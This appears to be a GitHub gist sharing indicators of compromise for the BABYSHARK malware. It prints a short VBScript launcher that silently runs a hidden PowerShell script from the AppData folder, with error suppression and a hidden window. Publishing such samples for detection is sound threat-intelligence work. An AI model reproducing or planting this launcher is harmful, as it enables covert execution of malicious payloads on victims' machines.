BABYSHARK malware indicators of compromise (beautified)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
On Error Resume Next | |
Set oShell = CreateObject("WScript.Shell") | |
Set oFSO=CreateObject("Scripting.FileSystemObject") | |
tmp0="powershell.exe cd $env:appdata ;powershell -executionpolicy remotesigned -file ""./Microsoft/dev.ps1""" | |
If oFSO.FolderExists("C:\Program Files (x86)") Then tmp0="C:\Windows\SysWOW64\WindowsPowerShell\v1.0\"& tmp0 End If | |
retu=oShell.run(tmp0,0,false) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment